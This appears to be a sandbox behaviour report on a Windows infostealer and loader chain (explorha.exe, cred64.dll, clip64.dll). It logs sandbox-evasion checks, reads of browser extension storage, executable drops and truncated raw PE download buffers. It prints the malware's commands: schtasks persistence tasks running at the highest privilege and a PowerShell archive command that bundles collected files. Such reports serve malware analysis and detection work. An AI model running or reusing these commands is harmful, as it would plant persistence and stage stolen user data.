NtProtectVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 192512 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01341000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00fc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	explorha.exe tried to sleep 1141 seconds, actually delayed analysis time by 1141 seconds
description	c2e58d8472.exe tried to sleep 286 seconds, actually delayed analysis time by 286 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (20 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW April 19, 2024, 1:11 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 9871581184 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 19, 2024, 1:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2816 crashed
__exception__ April 19, 2024, 1:11 p.m.	stacktrace: 0xa13208 0x98000a 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 10 1f a1 00 00 00 00 00 09 00 00 00 00 00 00 00 exception.instruction: adc byte ptr [rdi], bl exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa13208 registers.r14: 253621192 registers.r15: 83304384 registers.rcx: 1348 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 253620448 registers.rsp: 253620168 registers.r11: 253624064 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 1360 registers.r12: 253620808 registers.rbp: 253620304 registers.rdi: 83106432 registers.rax: 9961472 registers.r13: 83170400	1	0	0

Steals private information from local Internet browsers (50 out of 5045 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\igkpcodhieompeloncfnbekccinhapdb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Sync Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegll\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\agoakfejjabomempkjlepdflaleeobhb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe
file	C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe
file	C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe
file	C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe
file	C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe
file	C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe
file	C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe
file	C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 19, 2024, 1:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe	1	1
ShellExecuteExW April 19, 2024, 1:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe	1	1
ShellExecuteExW April 19, 2024, 1:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe	1	1
ShellExecuteExW April 19, 2024, 1:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe	1	1
ShellExecuteExW April 19, 2024, 1:10 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW April 19, 2024, 1:10 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main filepath: rundll32.exe	1	1
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 536 thread_handle: 0x000001c8 process_identifier: 1676 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001cc	1	1
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 1704 thread_handle: 0x000001d4 process_identifier: 880 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001d0	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (20 events)

Time & API	Arguments	Status	Return
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: pw.exe process_identifier: 1684	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: taskhost.exe process_identifier: 1984	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: SearchFilterHost.exe process_identifier: 516	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: explorha.exe process_identifier: 2264	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: chrome.exe process_identifier: 2816	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: chrome.exe process_identifier: 2904	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: mscorsvw.exe process_identifier: 2976	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: c2e58d8472.exe process_identifier: 3008	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: svchost.exe process_identifier: 3032	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: explorha.exe process_identifier: 1572	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: rundll32.exe process_identifier: 2100	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: rundll32.exe process_identifier: 2236	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: mscorsvw.exe process_identifier: 2600	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: sppsvc.exe process_identifier: 2704	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: powershell.exe process_identifier: 2728	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: conhost.exe process_identifier: 2832	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: cmd.exe process_identifier: 2032	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: conhost.exe process_identifier: 2068	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: pw.exe process_identifier: 2172	1	1
Process32NextW April 19, 2024, 1:10 p.m.	snapshot_handle: 0x00000504 process_name: rundll32.exe process_identifier: 2480	1	1

An executable file was downloaded by the process explorha.exe (6 events)

Time & API	Arguments	Status	Return
InternetReadFile April 19, 2024, 1:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $*Rän3@n3@n3@5[A`3@5[Að3@»^A\|3@»^Az3@»^A3@5[Az3@5[A}3@n3@º3@õ]Ao3@õ]u@o3@õ]Ao3@Richn3@PEL¿»eàÜª@Mð@pM@Vpj`à¸&Mh&M PÖ@à.rsrcà`æ@À.idata pè@À ,ê@àryrngzou°2ªì@àkklsvmjs0M@à.taggant0@M"@à request_handle: 0x00cc000c	1	1
InternetReadFile April 19, 2024, 1:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELàë!fà"¬ wÀ @0u½@@@d\|@ \|a°uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc\|a@ bô@@.relocu°vV@B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè]N$èUÆ^ÃUìQSVWùûÿÿ@Ç8ûÿÿ\ÉIPûÿÿ:ûÿÿ\|üÿÿÀi3öVVVhHÉIÿÐÇI9·dýÿÿ[3ö9·4ýÿÿKËè®3ö9·Dýÿÿ3ö9·Týÿÿ·lýÿÿÎè÷º3ÉÇF@Ç9ûÿÿt5MüQMüQûÿÿè/ûÿÿ@ÈèÆ@Ç¸ûÿÿuÎÿlÈIOàÉkOÔÉu3Û_ÜOÄÉãO¤_Ìè`þÿÿè 